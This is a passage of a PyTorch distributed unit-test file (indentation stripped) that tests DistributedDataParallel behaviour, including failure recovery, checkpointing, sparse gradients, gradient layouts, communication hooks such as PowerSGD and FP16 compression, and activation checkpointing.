IgnoredOutputWithUnusedParameters().float(),
process_group=process_group,
find_unused_parameters=True,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
# Run a few iterations where we ignore the output.
for _ in range(4):
output = model(input)
del output
# Run a few iterations where we use the output.
for _ in range(4):
output = model(input)
loss = criterion(output, target)
loss.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_failure_recovery(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# need to create a separate file for the recovered FileStore, because
# the original one will be deleted when destructing the first FileStore.
recovery_filename = self.file_name + "_recovery"
if self.rank == 0:
# the file will be deleted by the recovered FileStore
open(recovery_filename, "w").close()
# not necessary to run barrier here, as DDP will synchronize
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = TestModel().float().to(device_id)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
del ddp
del process_group
del store # this will delete self.file_name
store = c10d.FileStore(recovery_filename, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_default_pg(self):
dist.init_process_group(
"nccl",
init_method=f"file://{self.file_name}",
world_size=self.world_size,
rank=self.rank,
)
default_pg = c10d.distributed_c10d._get_default_group()
dist.destroy_process_group(default_pg)
self.assertFalse(dist.is_initialized())
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_save_load_checkpoint(self):
dist.init_process_group(
"gloo",
init_method=f"file://{self.file_name}",
world_size=self.world_size,
rank=self.rank,
)
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
def train_loop(model, optimizer, iterations):
for _ in range(iterations):
optimizer.zero_grad()
output = model(input)
loss = criterion(output, target)
loss.backward()
optimizer.step()
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model_withload = TestModel().float().to(device_id)
model_withoutload = TestModel().float().to(device_id)
ddp_withload = DistributedDataParallel(
model_withload,
device_ids=[device_id],
)
ddp_withoutload = DistributedDataParallel(
model_withoutload,
device_ids=[device_id],
)
# ensure that all the three models start with the same set of parameters. By default they are randomized on construction
for p in ddp_withload.parameters():
with torch.no_grad():
p.zero_()
for p in model_withload.parameters():
with torch.no_grad():
p.zero_()
for p in ddp_withoutload.parameters():
with torch.no_grad():
p.zero_()
batch_size = 4
criterion = nn.CrossEntropyLoss()
optimizer_withload = torch.optim.SGD(ddp_withload.parameters(), lr=0.001)
optimizer_non_ddp_withload = torch.optim.SGD(model_withload.parameters(), lr=0.001)
optimizer_withoutload = torch.optim.SGD(ddp_withoutload.parameters(), lr=0.001)
input = torch.rand([batch_size, 2], dtype=torch.float).to(device_id)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# run the model for 6 iterations, with a checkpoint in the middle
train_loop(ddp_withload, optimizer_withload, 3)
# zero out parameters of both DDP and non-DDP models and reload them from the DDP state dict
checkpoint_path = tempfile.gettempdir() + "/model.checkpoint"
if self.rank == 0:
torch.save(ddp_withload.state_dict(), checkpoint_path)
dist.barrier()
map_location = {"cuda:%d" % 0: "cuda:%d" % self.rank}
ddp_state_dict = torch.load(checkpoint_path, map_location=map_location)
for model in [ddp_withload, model_withload]:
for p in ddp_withload.parameters():
with torch.no_grad():
p.zero_()
ddp_withload.load_state_dict(ddp_state_dict)
# the non-DDP model needs to first remove the prefix of "module." from the DDP state dict
torch.nn.modules.utils.consume_prefix_in_state_dict_if_present(ddp_state_dict, "module.")
model_withload.load_state_dict(ddp_state_dict)
train_loop(ddp_withload, optimizer_withload, 3)
train_loop(model_withload, optimizer_non_ddp_withload, 3)
# re-run the model with the same inputs for 6 iterations with no checkpoint
train_loop(ddp_withoutload, optimizer_withoutload, 6)
for p_withload, p_withoutload, p_non_ddp_withload in zip(
ddp_withload.parameters(), ddp_withoutload.parameters(), model_withload.parameters()
):
self.assertEqual(p_withload, p_withoutload)
self.assertEqual(p_non_ddp_withload, p_withoutload)
def _run_and_verify_sparse_gradients(self, vanilla_model, ddp_model):
mult = 2
batch_size = mult * self.world_size
criterion = nn.CrossEntropyLoss()
input = torch.randint(0, 10, [batch_size, 2])
target = torch.randint(0, 10, [batch_size])
# Run with entire batch against single process version
criterion(vanilla_model(input), target).backward()
# Run with partial batch against multi process version
partial_input = input.split(mult)[self.rank]
partial_target = target.split(mult)[self.rank]
criterion(ddp_model(partial_input), partial_target).backward()
# Check that the gradients are sparse and identical
vanilla_parameter = next(vanilla_model.parameters())
ddp_parameter = next(ddp_model.parameters())
self.assertEqual(vanilla_parameter.grad, ddp_parameter.grad)
def _test_sparse_gradients(self, gradient_as_bucket_view=False):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Ensure initialized weights and inputs are identical across processes
torch.manual_seed(1337)
vanilla_model = SparseGradientModule()
ddp_model = DistributedDataParallel(
copy.deepcopy(vanilla_model),
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
self._run_and_verify_sparse_gradients(vanilla_model, ddp_model)
@requires_gloo()
def test_sparse_gradients(self):
self._test_sparse_gradients()
@requires_gloo()
def test_sparse_gradients_grad_is_view(self):
self._test_sparse_gradients(gradient_as_bucket_view=True)
def _test_grad_layout(self, replica_devices, layer_devs, local_batch_size):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = local_batch_size * self.world_size
# Carry out some trials with small buckets and some with big buckets.
bucketsizes = (0.000001, 25)
# Tuples of lists. Each list describes per-layer characteristics for one trial.
layer_formats = (
[torch.contiguous_format] * 4,
[torch.channels_last] * 2 + [torch.contiguous_format] * 2,
[torch.channels_last] * 4,
)
layer_dtypes = (
[torch.float] * 4,
[torch.float] * 2 + [torch.half] * 2,
[torch.half] * 4,
)
input_dev = layer_devs[0] if isinstance(layer_devs, list) else layer_devs
target_dev = layer_devs[-1] if isinstance(layer_devs, list) else layer_devs
input = torch.randn(
(global_batch_size, 8, 8, 8), device=input_dev, dtype=torch.float
)
target = torch.randn(
(global_batch_size, 8, 4, 4), device=target_dev, dtype=torch.float
)
local_batch_start = self.rank * local_batch_size
local_batch_end = (self.rank + 1) * local_batch_size
# Reducer.cpp sneakily creates one "initial bucket" that ignores the "bucket_cap_mb"
# argument. The following makes sure the initial bucket also complies.
@contextmanager
def first_bucket_size(ddp_bucket_mb):
old_DEFAULT_FIRST_BUCKET_BYTES = dist._DEFAULT_FIRST_BUCKET_BYTES
dist._DEFAULT_FIRST_BUCKET_BYTES = int(ddp_bucket_mb * 1.0e6)
try:
yield
finally:
dist._DEFAULT_FIRST_BUCKET_BYTES = old_DEFAULT_FIRST_BUCKET_BYTES
with torch.backends.cudnn.flags(
enabled=True, deterministic=True, benchmark=False
):
for formats, dtypes, bucketsize in product(
layer_formats, layer_dtypes, bucketsizes
):
with first_bucket_size(bucketsize):
model_msg = (
"rank = {} formats = {} dtypes = {} bucketsize = {} ".format(
self.rank, formats, dtypes, bucketsize
)
)
try:
m = ConvNet(layer_devs, formats, dtypes)
m_ddp = DistributedDataParallel(
copy.deepcopy(m),
device_ids=replica_devices,
process_group=process_group,
bucket_cap_mb=bucketsize,
)
opt = torch.optim.SGD(m.parameters(), lr=0.1)
opt_ddp = torch.optim.SGD(m_ddp.parameters(), lr=0.1)
has_half = any(p.dtype is torch.half for p in m.parameters())
tol = 1.0e-3 if has_half else 1.0e-5
except BaseException:
# Prints case-specific debugging info to narrow down failing case.
print(
"Caught exception during model creation for " + model_msg,
flush=True,
)
raise
# 3 iters: First iter creates grads, second iter retests after rebucketing,
# third iter tries zeroed grads.
for it in range(3):
iter_msg = "iter = {} ".format(it) + model_msg
named_msg = iter_msg
try:
F.mse_loss(m(input).float(), target).backward()
F.mse_loss(
m_ddp(input[local_batch_start:local_batch_end]).float(),
target[local_batch_start:local_batch_end],
).backward()
for i, ((layer_name, m_child), m_ddp_child) in enumerate(
zip(m.named_children(), m_ddp.module.children())
):
named_msg = layer_name + ".weight" + " " + iter_msg
self.assertTrue(
m_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
self.assertTrue(
m_ddp_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
for j, ((param_name, p), p_ddp) in enumerate(
zip(
m_child.named_parameters(),
m_ddp_child.parameters(),
)
):
named_msg = (
layer_name + "." + param_name + " " + iter_msg
)
self.assertEqual(
p.grad, p_ddp.grad, rtol=tol, atol=tol
)
opt.step()
opt_ddp.step()
if it == 0:
for p, p_ddp in zip(m.parameters(), m_ddp.parameters()):
p.grad = None
p_ddp.grad = None
else:
m.zero_grad()
m_ddp.zero_grad()
except BaseException:
# Makes sure we still get info if an error occurred somewhere other than the asserts.
print(
"Caught exception during iterations at " + named_msg,
flush=True,
)
raise
@requires_nccl()
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_grad_layout_1devicemodule_1replicaperprocess(self):
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
# Tells DDP to use just one device.
replica_devices = [dev0]
# Tells _test_grad_layout to construct ConvNet with all layers on this process's first assigned device.
layer_devs = dev0
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(4)
@skip_if_rocm
def test_grad_layout_2devicemodule(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
dev0 = torch.device("cuda:" + str(int_devices[0]))
dev1 = torch.device("cuda:" + str(int_devices[1]))
# DDP's default behavior for a multi-device module is "don't replicate."
replica_devices = None
# Tells _test_grad_layout to constructs this process's ConvNet on 2 devices, with 2 layers on each device.
layer_devs = [dev0] * 2 + [dev1] * 2
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_param_layout_mismatch_error(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
layer_devs = dev0
layer_formats = (
[torch.contiguous_format] * 4
if self.rank == 0
else [torch.channels_last] * 4
)
layer_dtypes = [torch.float] * 4
m = ConvNet(layer_devs, layer_formats, layer_dtypes)
if self.rank == 0:
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
else:
with self.assertRaisesRegex(
RuntimeError,
".* appears not to match strides of the same param in process 0",
):
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
@requires_gloo()
def test_ddp_comm_hook_future_passing_cpu(self):
"""
This unit test verifies whether the Future object is passed properly.
The callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Test on CPU
cpu_model = DistributedDataParallel(
ModuleForDdpCommHook().cpu(), process_group=process_group
)
# Register DDP Communication Hook
cpu_model.register_comm_hook(None, self._simple_hook)
# check whether the grads are equal to what then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(cpu_model, 8, 2 * torch.ones(2, 2))
def _gpu_model_with_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False, state=None
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
def _gpu_model_with_builtin_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a built-in DDP communication hook if defined
if hook is not None:
gpu_model._register_builtin_comm_hook(hook)
return gpu_model
def _run_and_verify_hook(self, model, input, expected_grad):
# Run forward
output = model(input, self.rank)
# Run backward
output.mean().backward()
[self.assertEqual(p.grad, expected_grad) for p in model.parameters()]
def _simple_hook(
self, state: object, bucket: dist.GradBucket
) -> torch.futures.Future:
fut = torch.futures.Future()
fut.set_result([torch.ones_like(t) for t in bucket.get_tensors()])
def fut_then(fut):
# Add ones to fut's result.
return [t + torch.ones_like(t) for t in fut.value()]
return fut.then(fut_then)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_future_passing_gpu_gloo(self):
"""
This unit test verifies whether the Future object is passed properly using gloo backend.
The hook callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Get GPU model with simple_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(process_group, self._simple_hook)
# check whether the grads are equal to what simple_hook's then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 2 * torch.ones(2, 2))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_future_passing_gpu_nccl(self):
"""
This unit test verifies whether the Future object is passed properly using nccl backend.
The hook callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with simple_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(process_group, self._simple_hook)
# check whether the grads are equal to what simple_hook's then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 2 * torch.ones(2, 2))
def _test_ddp_comm_hook_allreduce_hook_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether a DDP communication hook that just calls
allreduce gives the same result with the case of no hook registered.
Without the then callback, the future_value in reducer is no longer
a PyObject, and this unit test verifies future_value is properly checked.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_hook(state: object, bucket: dist.GradBucket) -> torch._C.Future:
tensors = [t / self.world_size for t in bucket.get_tensors()]
return process_group.allreduce(tensors).get_future()
# Get GPU model with allreduce_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_hook, gradient_as_bucket_view
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_default_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether default Python DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# For these default DDP comm hooks, the only state is process group.
state = process_group
for hook in [default.allreduce_hook, default.fp16_compress_hook]:
# Get GPU model with the hook registered.
# The first arg 'process_group' is used for initializing the test environment,
# so it cannot be replaced by 'state', although they have the same value.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_fp16_compress_wrapper(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether wrapping the ALLREDUCE and POWER_SGD hooks with
the FP16_WRAPPER can give the same result as when there is no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
powerSGD_state = powerSGD.PowerSGDState(process_group=process_group)
hook_args = [(powerSGD.powerSGD_hook, powerSGD_state), (default.allreduce_hook, process_group)]
for hook, state in hook_args:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default.fp16_compress_wrapper(hook),
gradient_as_bucket_view,
state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_powerSGD_ddp_comm_hook_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether Python DDP communication hook POWER_SGD
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with the hook registered.
# Test the hook with different algorithmic configs.
for use_error_feedback, warm_start in product([True, False], [True, False]):
state = powerSGD.PowerSGDState(
process_group=process_group,
matrix_approximation_rank=1,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
for hook in [powerSGD.powerSGD_hook, powerSGD.batched_powerSGD_hook]:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_builtin_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether built-in C++ DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for comm_hook_type in [
dist.BuiltinCommHookType.ALLREDUCE,
dist.BuiltinCommHookType.FP16_COMPRESS,
]:
# Get GPU model with the built-in communication hook.
gpu_model = self._gpu_model_with_builtin_ddp_comm_hook(
process_group, comm_hook_type, gradient_as_bucket_view
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl(self):
self._test_ddp_comm_hook_allreduce_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl(self):
self._test_default_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_nccl(self):
self._test_fp16_compress_wrapper()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl(self):
self._test_builtin_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl(self):
self._test_powerSGD_ddp_comm_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_grad_is_view(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(gradient_as_bucket_view=True)
def test_invalid_powerSGD_state(self):
for start_powerSGD_iter, use_error_feedback, warm_start in product(
[0, 1], [True, False], [True, False]
):
if not use_error_feedback and not warm_start:
continue
with self.assertRaisesRegex(
ValueError,
"Expect `start_powerSGD_iter` > 1 if `use_error_feedback` or `warm_start` is enabled, "
"because PowerSGD can only be applied after the first two iterations in DDP.",
):
state = powerSGD.PowerSGDState(
process_group=None,
matrix_approximation_rank=1,
start_powerSGD_iter=start_powerSGD_iter,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl_is_view(self):
self._test_default_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_is_view(self):
self._test_fp16_compress_wrapper(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl_grad_is_view(self):
self._test_builtin_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl_grad_is_view(self):
self._test_powerSGD_ddp_comm_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_with_then_hook_nccl(self):
"""
This unit test verifies whether a DDP communication hook that calls allreduce and then
multiplies the result by ten and divides by two gives the expected result.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_with_then_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future:
tensors = [t / self.world_size for t in bucket.get_tensors()]
fut = process_group.allreduce(tensors).get_future()
def mult(fut):
# Multiply the result by 10.
return [10 * t for t in fut.value()]
def div(fut):
# Divide the result by 2.
return [0.5 * t for t in fut.value()]
return fut.then(mult).then(div)
# Get GPU model with allreduce_with_then_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_with_then_hook
)
# check whether the grads are equal to what allreduce returns multuplied by 5.
# without the comm_hook, result would be still 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 1.25 * torch.ones(2, 2))
@requires_gloo()
def test_ddp_invalid_comm_hook_init(self):
"""
This unit test makes sure that register_comm_hook properly checks the format
of hook defined by user. The Python hook must be callable. This test also
checks whether bucket annotation checked properly if defined.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
model = DistributedDataParallel(
ModuleForDdpCommHook(), process_group=process_group
)
with self.assertRaisesRegex(TypeError, "Communication hook must be callable."):
model.register_comm_hook(state=None, hook=1)
with self.assertRaisesRegex(
ValueError, "bucket annotation should be dist.GradBucket."
):
def comm_hook(state: object, bucket: int) -> torch.futures.Future:
return torch.futures.Future()
model.register_comm_hook(state=None, hook=comm_hook)
@requires_gloo()
def test_ddp_invalid_comm_hook_return_type(self):
"""
This test checks whether return annotation checked properly if defined. It also
checks whether an internal error is thrown if return type is incorrect and user
hasn't specified any return type annotation.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
model = DistributedDataParallel(
ModuleForDdpCommHook(), process_group=process_group
)
with self.assertRaisesRegex(
ValueError,
"Communication hook: return annotation should be torch.futures.Future or torch._C.Future.",
):
def comm_hook(state: object, bucket: dist.GradBucket) -> int:
return torch.futures.Future()
model.register_comm_hook(state=None, hook=comm_hook)
with self.assertRaisesRegex(
RuntimeError,
"callback must return a torch.futures.Future or torch._C.Future object, but got",
):
def comm_hook(state: object, bucket: dist.GradBucket):
return 1
model.register_comm_hook(state=None, hook=comm_hook)
# Run forward
output = model(8, self.rank)
# Run backward
output.mean().backward()
@requires_gloo()
def test_ddp_comm_hook_register_just_once(self):
"""
DDP communication hook can only be registered once. This test validates whether
the error is thrown properly when register_comm_hook is called more than once.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
model = DistributedDataParallel(
ModuleForDdpCommHook(), process_group=process_group
)
def dummy_hook(state, bucket):
fut = torch.futures.Future()
fut.set_result(bucket.get_tensors())
return fut
model.register_comm_hook(None, dummy_hook)
with self.assertRaisesRegex(
RuntimeError,
"register_comm_hook or register_builtin_comm_hook can only be called once.",
):
model.register_comm_hook(None, dummy_hook)
@requires_gloo()
def test_ddp_comm_hook_sparse_gradients(self):
"""
Runs "test_sparse_gradients" unit test with DDP communication hook. We define a
simple hook that does allreduce and works with gloo backend for this test.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Ensure initialized weights and inputs are identical across processes
torch.manual_seed(1337)
vanilla_model = SparseGradientModule()
ddp_model = DistributedDataParallel(
copy.deepcopy(vanilla_model),
process_group=process_group,
)
# "get_future" API does not support gloo backend, see GH Issue #42048.
# Instead, we wait for an allreduce work, and write its result to a Future.
def allreduce_hook_gloo(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future:
# Prepare allreduced grad bucket tensors by running an async work.
work = process_group.allreduce(bucket.get_tensors())
work.wait()
fut = torch.futures.Future()
fut.set_result([t / self.world_size for t in bucket.get_tensors()])
return fut
ddp_model.register_comm_hook(None, allreduce_hook_gloo)
self._run_and_verify_sparse_gradients(vanilla_model, ddp_model)
class AcceptsParam(torch.nn.Module):
def __init__(self, p, factor):
super().__init__()
self.a = p
self.f = factor
def forward(self, input):
return input + self.a * self.f
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
size = 2048 * 2048
dev = self.rank
world = self.world_size
p = torch.nn.Parameter(torch.randn(size, requires_grad=True))
for try_set_to_none, use_bucket_view in product((False, True), (False, True)):
m = torch.nn.Sequential(self.AcceptsParam(p, dev + 1),
self.AcceptsParam(p, dev + 1)).cuda(dev)
m = torch.nn.parallel.DistributedDataParallel(m,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[dev],
process_group=process_group)
for i in range(3):
m.zero_grad(set_to_none=try_set_to_none)
m(1).sum().backward()
# Each param value is multiplied by "rank + 1" twice in forward, so the grad
# values produced by a particular rank should be 2. * (rank + 1).
# Summing these over ranks and dividing by world size gives the expected result:
analytic = torch.full_like(p, 2. * (world * (world + 1.) / 2.) / world, device=dev)
for name, p in m.named_parameters():
self.assertEqual(p.grad, analytic, "mismatch at " + name + ".grad for " +
"set_to_none = {}, use_bucket_view = {}".format(try_set_to_none,
use_bucket_view))
# A list of tests for ddp with activation checkpointing
# when gradient_as_bucket_view=True, False.
# Most of the tests are referred to
# https://github.com/facebookresearch/fairscale/blob/master/tests/nn/pipe/test_checkpoint_ddp.py
class CheckpointOnceModule(nn.Module):
def __init__(self):
super().__init__()
self.l1 = nn.Linear(2000, 2000)
self.l2 = nn.Linear(2000, 2000)
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
return x
class CheckpointTwiceModule(CheckpointOnceModule):
def __init__(self):
super().__init__()
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
x = checkpoint(self.l2, x)
return x
def _test_ddp_checkpointing(self, checkpoint_once, process_group, use_bucket_view, find_unused_parameters=False):
# to reprodce the same training results
torch.cuda.set_device(self.rank)
torch.manual_seed(31415)
if checkpoint_once:
model = self.CheckpointOnceModule().cuda()
else:
model = self.CheckpointTwiceModule().cuda()
model = nn.parallel.DistributedDataParallel(model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group,
find_unused_parameters=find_unused_parameters)
input_tensor = torch.rand((64, 2000), device="cuda", requires_grad=True)
output_tensor = model(input_tensor)
output_tensor.sum().backward()
return model
# DDP works as expect when layer is checkpointed only once
@requires_nccl()
@unittest.skip("TODO: Test is always failing - https://github.com/pytorch/pytorch/issues/55071")
def test_ddp_checkpointing_once(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
model = self._test_ddp_checkpointing(checkpoint_once=True,
process_group=process_group,
use_bucket_view=use_bucket_view)
norm = 0.0
for p in model.parameters():
self.assertTrue(p.grad is not None)
norm += p.grad.norm().item()
assert numpy.allclose(norm, 78053), norm
# DDP will fail when there are unused_parameters in the model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_unused_params(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(checkpoint_once=True,
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True)
# DDP will fail when the same layer is checkponted twice
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_twice(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(checkpoint_once=False,
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True)
# DDP works as expected if there is weight sharing among layers
@requires_nccl()
@unittest.skip("TODO: Test is always failing - https://github.com/pytorch/pytorch/issues/55071")
def test_ddp_checkpointing_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
torch.cuda.set_device(self.rank)
for use_bucket_view in (True, False):
